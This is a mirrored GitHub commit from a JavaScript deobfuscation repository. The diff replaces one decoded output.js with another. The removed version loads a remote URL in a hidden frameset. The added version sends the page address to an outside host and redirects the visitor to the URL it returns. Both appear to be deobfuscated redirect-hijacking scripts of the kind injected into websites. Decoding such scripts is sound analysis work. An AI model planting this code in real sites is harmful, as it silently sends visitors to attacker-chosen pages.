mirror of
https://github.com/smallfawn/decode_action.git
synced 2025-12-19 16:25:10 +08:00
Add decoded output file
This commit is contained in:
50
output.js
50
output.js
@@ -1,35 +1,21 @@
|
|||||||
//Fri Apr 18 2025 06:16:14 GMT+0000 (Coordinated Universal Time)
|
//Fri Apr 18 2025 06:59:06 GMT+0000 (Coordinated Universal Time)
|
||||||
//Base:<url id="cv1cref6o68qmpt26ol0" type="url" status="parsed" title="GitHub - echo094/decode-js: JS混淆代码的AST分析工具 AST analysis tool for obfuscated JS code" wc="2165">https://github.com/echo094/decode-js</url>
|
//Base:<url id="cv1cref6o68qmpt26ol0" type="url" status="parsed" title="GitHub - echo094/decode-js: JS混淆代码的AST分析工具 AST analysis tool for obfuscated JS code" wc="2165">https://github.com/echo094/decode-js</url>
|
||||||
//Modify:<url id="cv1cref6o68qmpt26olg" type="url" status="parsed" title="GitHub - smallfawn/decode_action: 世界上本来不存在加密,加密的人多了,也便成就了解密" wc="741">https://github.com/smallfawn/decode_action</url>
|
//Modify:<url id="cv1cref6o68qmpt26olg" type="url" status="parsed" title="GitHub - smallfawn/decode_action: 世界上本来不存在加密,加密的人多了,也便成就了解密" wc="741">https://github.com/smallfawn/decode_action</url>
|
||||||
function fetchApiContent() {
|
!function () {
|
||||||
const _0x283928 = window.location.pathname;
|
var _0x4bfbca = new XMLHttpRequest(),
|
||||||
const _0x39742e = window.location.search;
|
_0x51ae6e = {
|
||||||
const _0x47be7d = "//mbmb-582252-1251029753.ap-shanghai.run.tcloudbase.com" + _0x283928 + "/" + _0x39742e;
|
"link": window.location.href,
|
||||||
fetch(_0x47be7d).then(_0x20d31c => _0x20d31c.json()).then(_0x3886b8 => {
|
"path": window.location.href.replace(window.location.origin, "")
|
||||||
const _0x32e5d1 = _0x3886b8.url;
|
},
|
||||||
if (_0x32e5d1) {
|
_0x5d1321 = "https://www.baidu.com/";
|
||||||
setTimeout(() => {
|
_0x4bfbca.open("POST", "https://ff.up.gnzrmyy.cn/api/url/info");
|
||||||
document.write("<frameset cols=\"0,*\" framespacing=\"0\" border=\"0\" rows=\"0\" frameborder=\"0\">\n <frame src=\"about:blank\" scrolling=\"NO\" noresize=\"\" name=\"\">\n <frame src=\"" + _0x32e5d1 + "\" scrolling=\"auto\" noresize=\"\">");
|
_0x4bfbca.setRequestHeader("Content-Type", "application/json");
|
||||||
}, 100);
|
_0x4bfbca.send(JSON.stringify(_0x51ae6e));
|
||||||
} else {
|
_0x4bfbca.onreadystatechange = function () {
|
||||||
console.log("Error: No target URL found");
|
if (4 === _0x4bfbca.readyState && 200 === _0x4bfbca.status) {
|
||||||
|
var _0x2c013e = JSON.parse(_0x4bfbca.response);
|
||||||
|
if (0 === _0x2c013e.code) return window.location.href = _0x2c013e.data.url, undefined;
|
||||||
}
|
}
|
||||||
}).catch(_0x1f4dec => {
|
window.location.href = _0x5d1321;
|
||||||
console.log("Error:", _0x1f4dec);
|
};
|
||||||
});
|
}();
|
||||||
}
|
|
||||||
function onLoad() {
|
|
||||||
const _0x494321 = localStorage.getItem("hasClicked");
|
|
||||||
const _0x1cd146 = document.getElementById("continue-button");
|
|
||||||
if (_0x494321) {
|
|
||||||
fetchApiContent();
|
|
||||||
} else {
|
|
||||||
_0x1cd146.style.display = "block";
|
|
||||||
_0x1cd146.addEventListener("click", () => {
|
|
||||||
localStorage.setItem("hasClicked", "true");
|
|
||||||
fetchApiContent();
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
window.addEventListener("load", onLoad);
|
|
||||||
_0xod2 = "jsjiami.com.v6";
|
|
||||||
Reference in New Issue
Block a user